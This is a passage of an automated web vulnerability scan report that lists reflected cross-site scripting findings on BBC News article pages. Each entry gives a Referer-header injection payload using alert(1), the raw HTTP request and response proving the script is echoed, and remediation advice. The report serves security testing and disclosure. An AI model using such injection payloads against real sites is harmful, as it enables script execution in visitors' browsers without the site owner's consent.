Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/technology-12429808 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e41b9'-alert(1)-'07f6b7abb93

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:18 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:03:18 GMT
Connection: close
Set-Cookie: BBC-UID=94dd25a5beeab646aa43d235a1935e56d65d40ed4050e1895b4bb37e58adf3ca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94dd25a5beeab646aa43d235a1935e56d65d40ed4050e1895b4bb37e58adf3ca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476198000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=e41b9'-alert(1)-'07f6b7abb93',
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12429808',
       assetType: 'story',
       uri: '/news/techn
...[SNIP]...

1.80. http://www.bbc.co.uk/news/uk-12427839 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12427839

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2eb1b'-alert(1)-'8724c7376a9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12427839 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2eb1b'-alert(1)-'8724c7376a9

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=742
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=042da5c53eca2628866cf59c51ed819ee4d8a7d06050a10a04cb8a056d600a1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=042da5c53eca2628866cf59c51ed819ee4d8a7d06050a10a04cb8a056d600a1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 67629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476200000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=2eb1b'-alert(1)-'8724c7376a9',
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427839',
       assetType: 'story',
       uri: '/news/uk-12427839',
       coun
...[SNIP]...

1.81. http://www.bbc.co.uk/news/uk-12437244 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12437244

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload addf5'-alert(1)-'815ccfa00f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12437244 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=addf5'-alert(1)-'815ccfa00f5

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=843d65c56eca3628a68c95df312714562a75ecac40f0810ad40b7a458d008afa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=843d65c56eca3628a68c95df312714562a75ecac40f0810ad40b7a458d008afa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476200000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=addf5'-alert(1)-'815ccfa00f5',
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437244',
       assetType: 'story',
       uri: '/news/uk-12437244',
       coun
...[SNIP]...

1.82. http://www.bbc.co.uk/news/uk-england-london-12438040 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-england-london-12438040

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6670'-alert(1)-'f959d1761eb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-england-london-12438040 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a6670'-alert(1)-'f959d1761eb

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:21 GMT
Keep-Alive: timeout=10, max=756
Expires: Sat, 12 Feb 2011 02:03:21 GMT
Connection: close
Set-Cookie: BBC-UID=242d95f5fe2a9649dabdcdd091ea970bb5c909e7d01041092b7b23ee805e64ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:21 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=242d95f5fe2a9649dabdcdd091ea970bb5c909e7d01041092b7b23ee805e64ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476201000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=a6670'-alert(1)-'f959d1761eb',
       section: 'london',
       sectionPath: '/England/London',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12438040',
       assetType: 'story',
       uri: '/news/uk-en
...[SNIP]...

1.83. http://www.bbc.co.uk/news/uk-northern-ireland-12427112 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12427112

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adb77'-alert(1)-'ac0d9679f22 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-northern-ireland-12427112 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=adb77'-alert(1)-'ac0d9679f22

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=743
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=74cdc5054e7a66baca0699cb21e6298c20cf357ea0b0c1ca747bfa65afa12cd60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=74cdc5054e7a66baca0699cb21e6298c20cf357ea0b0c1ca747bfa65afa12cd60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476202000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=adb77'-alert(1)-'ac0d9679f22',
       section: 'northern-ireland',
       sectionPath: '/Northern Ireland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427112',
       assetType: 'story',
       uri:
...[SNIP]...

1.84. http://www.bbc.co.uk/news/uk-northern-ireland-12428837 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12428837

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6007c'-alert(1)-'aa5a9db598a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-northern-ireland-12428837 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6007c'-alert(1)-'aa5a9db598a

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:23 GMT
Keep-Alive: timeout=10, max=734
Expires: Sat, 12 Feb 2011 02:03:23 GMT
Connection: close
Set-Cookie: BBC-UID=041de5c5ae7a263b0f30a7c8619c953d60950a88c020915ab4db4ae541e1face0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=041de5c5ae7a263b0f30a7c8619c953d60950a88c020915ab4db4ae541e1face0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476203000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6007c'-alert(1)-'aa5a9db598a',
       section: 'northern-ireland',
       sectionPath: '/Northern Ireland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428837',
       assetType: 'story',
       uri:
...[SNIP]...

1.85. http://www.bbc.co.uk/news/uk-politics-12428814 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-politics-12428814

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4070'-alert(1)-'1fec68ff8b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-politics-12428814 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d4070'-alert(1)-'1fec68ff8b7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:23 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:23 GMT
Connection: close
Set-Cookie: BBC-UID=841da5052eba964b3bf9406e1196754dc30f62ec6060c1c9eb6be36f5b84620e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=841da5052eba964b3bf9406e1196754dc30f62ec6060c1c9eb6be36f5b84620e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476203000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=d4070'-alert(1)-'1fec68ff8b7',
       section: 'politics',
       sectionPath: '/Politics',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428814',
       assetType: 'story',
       uri: '/news/uk-politi
...[SNIP]...

1.86. http://www.bbc.co.uk/news/uk-scotland-12433015 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-12433015

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae8f6'-alert(1)-'adf5e105baf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-scotland-12433015 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ae8f6'-alert(1)-'adf5e105baf

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:24 GMT
Keep-Alive: timeout=10, max=796
Expires: Sat, 12 Feb 2011 02:03:24 GMT
Connection: close
Set-Cookie: BBC-UID=e4bde5657eaad6cc79d586334191a004b2670d2660f091bf122960ec569037d60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:24 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e4bde5657eaad6cc79d586334191a004b2670d2660f091bf122960ec569037d60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 59211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476204000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=ae8f6'-alert(1)-'adf5e105baf',
       section: 'scotland',
       sectionPath: '/Scotland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12433015',
       assetType: 'story',
       uri: '/news/uk-scotla
...[SNIP]...

1.87. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-tayside-central-12433192

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba096'-alert(1)-'7db420ae8d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-scotland-tayside-central-12433192 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ba096'-alert(1)-'7db420ae8d7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:25 GMT
Keep-Alive: timeout=10, max=756
Expires: Sat, 12 Feb 2011 02:03:25 GMT
Connection: close
Set-Cookie: BBC-UID=443dd5b57e4a86dd6b0a224d51a257759338037a409081faf46baa84f18c62bc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=443dd5b57e4a86dd6b0a224d51a257759338037a409081faf46baa84f18c62bc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476205000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=ba096'-alert(1)-'7db420ae8d7',
       section: 'tayside-and-central',
       sectionPath: '/Scotland/Tayside and Central',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12433192',
       assetType: 's
...[SNIP]...

1.88. http://www.bbc.co.uk/news/uk-wales-12427865 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12427865

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb76d'-alert(1)-'781c170215e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-wales-12427865 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cb76d'-alert(1)-'781c170215e

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=94ad65c5ee3af6ffba362eb2e17681f2c4f94a9880f0815a44ab5ac5ed6006840Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94ad65c5ee3af6ffba362eb2e17681f2c4f94a9880f0815a44ab5ac5ed6006840Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476207000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=cb76d'-alert(1)-'781c170215e',
       section: 'wales',
       sectionPath: '/Wales',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427865',
       assetType: 'story',
       uri: '/news/uk-wales-124278
...[SNIP]...

1.89. http://www.bbc.co.uk/news/uk-wales-12433322 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12433322

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76224'-alert(1)-'111f098e998 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-wales-12433322 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=76224'-alert(1)-'111f098e998

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=a41dc5259eca66afea33e621b10bd5ee0d9dbaccf0a0b1e9bb2b938ee86d539a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a41dc5259eca66afea33e621b10bd5ee0d9dbaccf0a0b1e9bb2b938ee86d539a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476207000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=76224'-alert(1)-'111f098e998',
       section: 'wales',
       sectionPath: '/Wales',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12433322',
       assetType: 'story',
